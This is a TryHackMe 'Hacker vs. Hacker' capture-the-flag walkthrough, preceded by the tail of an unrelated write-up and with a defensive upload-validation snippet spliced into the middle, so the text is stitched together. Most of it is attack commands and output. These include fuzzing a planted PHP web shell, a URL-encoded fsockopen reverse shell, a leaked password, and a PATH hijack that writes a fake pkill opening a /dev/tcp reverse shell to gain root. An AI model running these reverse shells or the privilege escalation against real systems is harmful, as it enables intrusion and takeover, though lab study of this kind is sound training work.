RCE from the console was successful with the help of the os module.

import os; print(os.popen("ls -l").read())

A: todo.db

Q3: Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?

Hint: The flag looks like THM{…}. Be sure to write it without the surrounding quotes!

Review the app.py code.

import os; print(os.popen("cat app.py").read())

A: THM{Just_a_tiny_misconfiguration}

TryHackMe – Hacker vs. Hacker Walkthrough

TryHackMe | Hacker vs. Hacker
Someone has compromised this server already! Can you get in and evade their countermeasures?
tryhackme.com

Task 1

Q1: What is the user.txt flag?

Hint: The hacker may have been a bit sloppy in their stealth measures…

Perform a port scan.

$ nmap -Pn -sC -sV -A -T4 10.10.93.193 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The open ports are now known.

Port  Service  Version
22    ssh      OpenSSH 8.2p1
80    http     Apache httpd 2.4.41

I was able to access the website on port 80.

Perform directory enumeration.

$ dirsearch -u http://10.10.93.193
[04:53:16] 301 -  310B  - /css  ->  http://10.10.93.193/css/
[04:53:17] 301 -  310B  - /cvs  ->  http://10.10.93.193/cvs/
[04:53:17] 200 -   26B  - /cvs/
[04:53:19] 301 -  311B  - /dist  ->  http://10.10.93.193/dist/
[04:53:19] 200 -  455B  - /dist/
[04:53:30] 301 -  313B  - /images  ->  http://10.10.93.193/images/
[04:53:30] 200 -  498B  - /images/
[04:54:14] 200 -  335B  - /upload.php

The file-upload page /upload.php has been rewritten.

The original process seems to be a function that checks whether the file is a .pdf and uploads it to /cvs.
In this case, the attacker would bypass the extension check by uploading a file with a name such as .pdf.php.
Since PHP is running on the server, it is likely that the attacker uploaded a PHP reverse shell file.

Predicting what the attacker would have uploaded, scan under /cvs for .pdf.php files.
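The bypass works because the upload check looks for `.pdf` somewhere in the name instead of validating the whole name. Added example (not the RecruitSec site's code; the function names, allow-list and magic-byte check are my assumptions): the weak check beside a strict one that inspects every dotted suffix, verifies the content looks like a PDF, and stores the file under a generated name so the client-supplied name never reaches the disk.

```python
import os
import uuid

ALLOWED_EXTENSIONS = {"pdf"}
PDF_MAGIC = b"%PDF-"


def weak_extension_check(filename):
    """Roughly what a "does the name contain .pdf" check does: it accepts
    shell.pdf.php because '.pdf' appears somewhere in the name."""
    return ".pdf" in filename.lower()


def strict_extension_check(filename):
    """Accept only names whose every dotted suffix is an allowed extension,
    so 'cv.pdf' passes and 'shell.pdf.php' (or 'cv.PHP') does not."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(ext in ALLOWED_EXTENSIONS for ext in parts[1:])


def validate_upload(filename, content):
    """Return the server-side name to store the file under, or None if the
    upload is rejected. The client-supplied name never reaches the disk."""
    if not strict_extension_check(filename):
        return None
    # The extension is attacker-controlled, so also require the content to
    # start like a PDF before accepting it.
    if not content.startswith(PDF_MAGIC):
        return None
    # A generated name with a single extension also removes the multi-extension
    # case (x.pdf.php) that lets a PHP handler pick the file up.
    return f"{uuid.uuid4().hex}.pdf"
```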

$ dirsearch -u http://10.10.222.254/cvs -e .pdf.php
[11:31:30] 200 -   18B  - /cvs/shell.pdf.php

/cvs/shell.pdf.php was hit.
Shell files can often execute commands with GET request parameters.
Fuzz the parameter name.

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.10.222.254/cvs/shell.pdf.php?FUZZ=ls -ic -c -fs 18
cmd                     [Status: 200, Size: 43, Words: 1, Lines: 4, Duration: 241ms]

The cmd parameter was discovered.

Send the parameter.

?cmd=php%20-r%20%27$sock=fsockopen(%2210.6.55.144%22,1234);exec(%22bash%20%3C%263%20%3E%263%202%3E%263%22);%27

Establish the reverse shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42840
ls
index.html
shell.pdf.php

You can get the flag from /home/lachlan/user.txt:

/home/lachlan/user.txt

thm{af7e46b68081d4025c5ce10851430617}

A: thm{af7e46b68081d4025c5ce10851430617}

Q2: What is the proof.txt flag?

Hint: … and a bit sloppy in their automated kill scripts.

When you check /home/lachlan/.bash_history, you will find that lachlan's password is thisistheway123.

./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\nthisistheway123\nthisistheway123" | passwd
ls -sf /dev/null /home/lachlan/.bash_history

However, when I connected over SSH, I was able to log in, but the connection was closed after a few seconds.

$ ssh lachlan@10.10.222.254
lachlan@10.10.222.254's password: 
Last login: Thu May  5 04:39:19 2022 from 192.168.56.1
$ pwdnope
Connection to 10.10.222.254 closed.

If you check the /etc/cron.d/persistence script found in /home/lachlan/.bash_history, you can see that the process is being killed by the script.

PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1  && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done

If you look at the commands, you can see that pkill is not specified with an absolute path, so it is looked up in order along PATH=/home/lachlan/bin:/bin:/usr/bin.
If you create a pkill file in /home/lachlan/bin, /home/lachlan/bin/pkill will be executed.

Make /home/lachlan/bin/pkill a reverse shell script.

echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill

Start listening with Netcat in advance.

$ nc -lvnp 1234

SSH in and enter the command before the process is killed.

$ ssh lachlan@10.10.222.254
$ echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill
$ nope

After a while, I was able to get the root shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42862
sh: 0: can't access tty; job control turned off
# whoami
root

You can get the flag from /root/root.txt:

/root/root.txt

thm{7b708e5224f666d3562647816ee2a1d4}

A: thm{7b708e5224f666d3562647816ee2a1d4}